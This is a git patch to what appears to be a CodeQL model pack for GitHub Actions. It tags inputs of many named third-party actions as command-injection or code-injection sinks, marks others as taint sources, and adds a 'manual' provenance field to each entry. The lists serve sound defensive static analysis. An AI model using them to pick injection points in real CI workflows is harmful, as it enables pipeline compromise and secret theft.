["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] + - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection"] + - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index a8db7e8313e..9f8d987c0af 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint"] + - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index d171499049a..90a18103868 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint"] + - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml index 42361b203e0..fd484074f5c 100644 --- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection"] \ No newline at end of file + - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml index 474b36186b0..5caaea9562e 100644 --- a/ql/lib/ext/snow-actions_eclint.model.yml +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["snow-actions/eclint", "*", "input.args", "command-injection"] + - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml index 73b93dbb88a..9462b8d5bbd 100644 --- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection"] - - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection"] - - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection"] - - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection"] - - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection"] \ No newline at end of file + - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] + - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"] + - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection", "manual"] + - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection", "manual"] + - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml index 4138b97f0fb..9b01987e1f2 100644 --- a/ql/lib/ext/step-security_harden-runner.model.yml +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection"] + - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 4ab448b04c1..10a3630ea0b 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint"] + - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml index 1bcbac476a8..aac20afddf5 100644 --- a/ql/lib/ext/tibdex_backport.model.yml +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tibdex/backport", "*", "input.body_template", "code-injection"] - - ["tibdex/backport", "*", "input.head_template", "code-injection"] - - ["tibdex/backport", "*", "input.labels_template", "code-injection"] - - ["tibdex/backport", "*", "input.title_template", "code-injection"] \ No newline at end of file + - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] + - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"] + - ["tibdex/backport", "*", "input.labels_template", "code-injection", "manual"] + - ["tibdex/backport", "*", "input.title_template", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 299c387c81a..8dcabd1650a 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint"] - - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] + - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] + - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index a7afc090a91..753303b0cb3 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -4,7 +4,7 @@ extensions: extensible: sourceModel data: # https://github.com/tj-actions/branch-names - - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch"] - - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run"] + - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch", "manual"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch", "manual"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run", "manual"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 7890668fa87..fb15abce061 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files", "manual"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 1946b78f5fd..8e4938368b8 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index 77706e266fe..61141e5f73b 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["trilom/file-changes-action", "*", "output.files", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files"] - - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files", "PR changed files", "manual"] + - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files", "manual"] + - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files", "manual"] + - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files", "manual"] diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml index 3072c6f54fd..ae166b1f515 100644 --- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection"] \ No newline at end of file + - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml index 5fe53ea3d07..a6cc6884389 100644 --- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection"] - - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection"] + - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] + - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index d4b083e14d2..c80590e4931 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tzkhan/pr-update-action", "*", "output.headMatch", ""] + - ["tzkhan/pr-update-action", "*", "output.headMatch", "", "manual"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml index 5e87f6c3b94..a352d6c9ff6 100644 --- a/ql/lib/ext/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["veracode/veracode-sca", "*", "input.url", "command-injection"] - - ["veracode/veracode-sca", "*", "input.path", "command-injection"] - - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection"] - - ["veracode/veracode-sca", "*", "input.url", "command-injection"] + - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] + - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"] + - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection", "manual"] + - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml index dbe5d2d542d..6ed71f18215 100644 --- a/ql/lib/ext/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wearerequired/lint-action", "*", "input.git_name", "command-injection"] - - ["wearerequired/lint-action", "*", "input.git_email", "command-injection"] - - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection"] + - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] + - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"] + - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection", "manual"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml index 9ecbdb6329f..5864c0d0ede 100644 --- a/ql/lib/ext/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection"] - - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection"] - - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection"] + - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] + - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"] + - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 31a1eb5bde9..2a4378d1712 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""] - - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"] diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml index 10920eb6bf5..880b0d606da 100644 --- a/ql/lib/ext/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection"] - - ["zaproxy/action-baseline", "*", "input.target", "command-injection"] - - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection"] - - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection"] \ No newline at end of file + - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] + - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"] + - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection", "manual"] + - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml index a1d49af0845..fd8172c6ca8 100644 --- a/ql/lib/ext/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection"] - - ["zaproxy/action-full-scan", "*", "input.target", "command-injection"] - - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection"] - - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] + - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"] + - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection", "manual"] + - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection", "manual"] From ae84303facb7861d6d40fc994d2cd4b7f938faee Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:25:23 +0200 Subject: [PATCH 0163/1267] Add models for composite actions sinks --- ...ctions_actions-runner-controller.model.yml | 14 ++++++++++++ .../composite-actions/adap_flower.model.yml | 9 ++++++++ .../agoric_agoric-sdk.model.yml | 11 ++++++++++ .../airbnb_lottie-ios.model.yml | 6 +++++ .../airbytehq_airbyte.model.yml | 7 ++++++ .../amazon-ion_ion-java.model.yml | 7 ++++++ .../composite-actions/anchore_grype.model.yml | 6 +++++ .../composite-actions/anchore_syft.model.yml | 6 +++++ .../angular_dev-infra.model.yml | 10 +++++++++ .../ansible_ansible-lint.model.yml | 7 ++++++ .../composite-actions/ansible_awx.model.yml | 7 ++++++ .../apache_arrow-datafusion.model.yml | 6 +++++ .../apache_arrow-rs.model.yml | 7 ++++++ .../composite-actions/apache_arrow.model.yml | 6 +++++ .../apache_bookkeeper.model.yml | 6 +++++ .../composite-actions/apache_brpc.model.yml | 6 +++++ .../apache_camel-k.model.yml | 17 ++++++++++++++ .../composite-actions/apache_camel.model.yml | 11 ++++++++++ .../composite-actions/apache_flink.model.yml | 10 +++++++++ .../composite-actions/apache_nuttx.model.yml | 8 +++++++ .../apache_opendal.model.yml | 9 ++++++++ .../composite-actions/apache_pekko.model.yml | 6 +++++ .../apache_pulsar-helm-chart.model.yml | 12 ++++++++++ .../apache_superset.model.yml | 6 +++++ .../appflowy-io_appflowy.model.yml | 7 ++++++ .../aptos-labs_aptos-core.model.yml | 8 +++++++ .../archivesspace_archivesspace.model.yml | 6 +++++ .../armadaproject_armada.model.yml | 6 +++++ .../composite-actions/armbian_build.model.yml | 14 ++++++++++++ .../auth0_auth0-java.model.yml | 9 ++++++++ .../auth0_auth0.net.model.yml | 8 +++++++ .../auth0_auth0.swift.model.yml | 6 +++++ .../autogluon_autogluon.model.yml | 10 +++++++++ .../composite-actions/avaiga_taipy.model.yml | 6 +++++ .../aws-amplify_amplify-cli.model.yml | 6 +++++ .../aws_amazon-vpc-cni-k8s.model.yml | 7 ++++++ .../aws_karpenter-provider-aws.model.yml | 7 ++++++ .../awslabs_amazon-eks-ami.model.yml | 12 ++++++++++ .../awslabs_aws-lambda-rust-runtime.model.yml | 6 +++++ .../azerothcore_azerothcore-wotlk.model.yml | 7 ++++++ .../azure_azure-datafactory.model.yml | 7 ++++++ .../badges_shields.model.yml | 6 +++++ .../balena-io_etcher.model.yml | 6 +++++ .../balena-os_balena-engine.model.yml | 6 +++++ .../ben-manes_caffeine.model.yml | 10 +++++++++ .../composite-actions/bokeh_bokeh.model.yml | 6 +++++ .../botpress_botpress.model.yml | 6 +++++ ...intree_braintree-android-drop-in.model.yml | 8 +++++++ .../braintree_braintree_android.model.yml | 9 ++++++++ .../broadinstitute_gatk.model.yml | 8 +++++++ .../canonical_multipass.model.yml | 7 ++++++ .../chia-network_actions.model.yml | 11 ++++++++++ .../chia-network_chia-blockchain.model.yml | 6 +++++ .../chipsalliance_chisel.model.yml | 7 ++++++ .../chocobozzz_peertube.model.yml | 7 ++++++ .../cilium_cilium-cli.model.yml | 12 ++++++++++ .../composite-actions/cilium_cilium.model.yml | 8 +++++++ .../citusdata_citus.model.yml | 8 +++++++ .../clerk_javascript.model.yml | 10 +++++++++ .../cloud-custodian_cloud-custodian.model.yml | 9 ++++++++ .../cloudflare_workers-sdk.model.yml | 6 +++++ ...cloudfoundry_cloud_controller_ng.model.yml | 6 +++++ .../composite-actions/coder_coder.model.yml | 6 +++++ .../composite-actions/coil-kt_coil.model.yml | 6 +++++ .../commaai_openpilot.model.yml | 8 +++++++ .../conan-io_conan-center-index.model.yml | 7 ++++++ .../corretto_corretto-8.model.yml | 9 ++++++++ .../cosmos_cosmos-sdk.model.yml | 6 +++++ .../composite-actions/coturn_coturn.model.yml | 6 +++++ .../crunchydata_postgres-operator.model.yml | 6 +++++ .../composite-actions/cvc5_cvc5.model.yml | 15 +++++++++++++ .../composite-actions/d2l-ai_d2l-en.model.yml | 9 ++++++++ ...build-check-deploy-gradle-action.model.yml | 12 ++++++++++ .../datadog_dd-trace-dotnet.model.yml | 10 +++++++++ .../datadog_dd-trace-go.model.yml | 9 ++++++++ .../datadog_dd-trace-js.model.yml | 7 ++++++ .../datafuselabs_databend.model.yml | 7 ++++++ .../davatorium_rofi.model.yml | 8 +++++++ .../debezium_debezium.model.yml | 6 +++++ .../defenseunicorns_zarf.model.yml | 6 +++++ ...lifiees_demarches-simplifiees.fr.model.yml | 6 +++++ ...of-veterans-affairs_vets-website.model.yml | 6 +++++ .../devexpress_devextreme.model.yml | 8 +++++++ .../diggerhq_digger.model.yml | 9 ++++++++ .../diku-dk_futhark.model.yml | 7 ++++++ .../discourse_.github.model.yml | 6 +++++ .../dnsjava_dnsjava.model.yml | 8 +++++++ .../dotintent_react-native-ble-plx.model.yml | 6 +++++ .../dotnet_docs-tools.model.yml | 6 +++++ .../dotnet_dotnet-monitor.model.yml | 6 +++++ .../dragonflydb_dragonfly.model.yml | 9 ++++++++ .../eksctl-io_eksctl.model.yml | 8 +++++++ .../elastic_apm-agent-dotnet.model.yml | 7 ++++++ .../elastic_apm-agent-java.model.yml | 10 +++++++++ .../elementor_elementor.model.yml | 13 +++++++++++ .../composite-actions/emberjs_data.model.yml | 6 +++++ .../composite-actions/emqx_emqx.model.yml | 8 +++++++ .../eonasdan_tempus-dominus.model.yml | 7 ++++++ .../composite-actions/erlang_otp.model.yml | 7 ++++++ .../esphome_esphome.model.yml | 8 +++++++ .../composite-actions/expensify_app.model.yml | 14 ++++++++++++ .../composite-actions/expo_expo.model.yml | 6 +++++ .../expo_vscode-expo.model.yml | 8 +++++++ ...xternal-secrets_external-secrets.model.yml | 7 ++++++ .../facebook_buck2.model.yml | 6 +++++ .../composite-actions/facebook_flow.model.yml | 6 +++++ .../composite-actions/facebook_yoga.model.yml | 7 ++++++ .../facebookresearch_xformers.model.yml | 10 +++++++++ .../fastly_compute-actions.model.yml | 6 +++++ .../composite-actions/felangel_bloc.model.yml | 9 ++++++++ .../firebase_firebase-ios-sdk.model.yml | 9 ++++++++ .../flaxengine_flaxengine.model.yml | 6 +++++ ...pperdevices_flipperzero-firmware.model.yml | 10 +++++++++ .../composite-actions/fluxcd_flux2.model.yml | 8 +++++++ .../forcedotcom_salesforcedx-vscode.model.yml | 6 +++++ .../fossasia_visdom.model.yml | 7 ++++++ .../freckle_stack-action.model.yml | 6 +++++ .../freeradius_freeradius-server.model.yml | 8 +++++++ .../composite-actions/gaphor_gaphor.model.yml | 7 ++++++ .../getsentry_action-release.model.yml | 6 +++++ .../github_codeql-action.model.yml | 10 +++++++++ .../composite-actions/github_ruby.model.yml | 10 +++++++++ .../gittools_gitversion.model.yml | 8 +++++++ .../go-spatial_tegola.model.yml | 7 ++++++ .../goauthentik_authentik.model.yml | 6 +++++ .../godotengine_godot.model.yml | 9 ++++++++ .../composite-actions/google_dagger.model.yml | 6 +++++ .../googleapis_java-cloud-bom.model.yml | 6 +++++ .../googleapis_sdk-platform-java.model.yml | 6 +++++ ...ooglecloudplatform_magic-modules.model.yml | 6 +++++ .../gravitational_teleport.model.yml | 10 +++++++++ .../grote_transportr.model.yml | 6 +++++ .../hashicorp_nomad.model.yml | 6 +++++ .../hashicorp_terraform.model.yml | 10 +++++++++ .../hashicorp_vault.model.yml | 7 ++++++ .../home-assistant_android.model.yml | 8 +++++++ .../homebrew_actions.model.yml | 14 ++++++++++++ ...erledger_aries-cloudagent-python.model.yml | 6 +++++ .../hyperledger_fabric-samples.model.yml | 8 +++++++ .../igniterealtime_openfire.model.yml | 8 +++++++ .../infracost_actions.model.yml | 6 +++++ ...nspektor-gadget_inspektor-gadget.model.yml | 18 +++++++++++++++ .../intel-analytics_ipex-llm.model.yml | 6 +++++ .../ionic-team_ionic-framework.model.yml | 16 ++++++++++++++ .../ionic-team_ionicons.model.yml | 14 ++++++++++++ .../ionic-team_stencil.model.yml | 11 ++++++++++ .../composite-actions/ipfs_aegir.model.yml | 9 ++++++++ .../jetbrains_jetbrainsruntime.model.yml | 6 +++++ .../jhipster_generator-jhipster.model.yml | 22 +++++++++++++++++++ .../jsocol_django-ratelimit.model.yml | 6 +++++ .../juicedata_juicefs.model.yml | 12 ++++++++++ .../jupyter_docker-stacks.model.yml | 8 +++++++ .../keycloak_keycloak.model.yml | 8 +++++++ .../composite-actions/kserve_kserve.model.yml | 8 +++++++ .../kubeflow_katib.model.yml | 10 +++++++++ .../kubeflow_training-operator.model.yml | 6 +++++ .../kubernetes-sigs_karpenter.model.yml | 6 +++++ .../kubernetes-sigs_kwok.model.yml | 6 +++++ .../kubescape_kubescape.model.yml | 7 ++++++ .../kubeshop_botkube.model.yml | 7 ++++++ .../kyverno_kyverno.model.yml | 8 +++++++ .../composite-actions/lancedb_lance.model.yml | 9 ++++++++ .../launchdarkly_ios-client-sdk.model.yml | 6 +++++ .../layer5labs_meshmap-snapshot.model.yml | 11 ++++++++++ .../ldc-developers_ldc.model.yml | 15 +++++++++++++ .../ledgerhq_ledger-live.model.yml | 8 +++++++ .../composite-actions/lerna_lerna.model.yml | 6 +++++ .../composite-actions/lf-edge_eve.model.yml | 8 +++++++ .../libgit2_libgit2.model.yml | 12 ++++++++++ .../lightning-ai_pytorch-lightning.model.yml | 13 +++++++++++ .../lightning-ai_torchmetrics.model.yml | 8 +++++++ .../linkerd_linkerd2.model.yml | 9 ++++++++ .../logseq_publish-spa.model.yml | 9 ++++++++ .../macvim-dev_macvim.model.yml | 7 ++++++ .../mamba-org_mamba.model.yml | 8 +++++++ .../maplibre_maplibre-native.model.yml | 16 ++++++++++++++ .../mastodon_mastodon.model.yml | 6 +++++ .../mavlink_qgroundcontrol.model.yml | 8 +++++++ .../mdanalysis_mdanalysis.model.yml | 13 +++++++++++ .../medic_cht-core.model.yml | 8 +++++++ 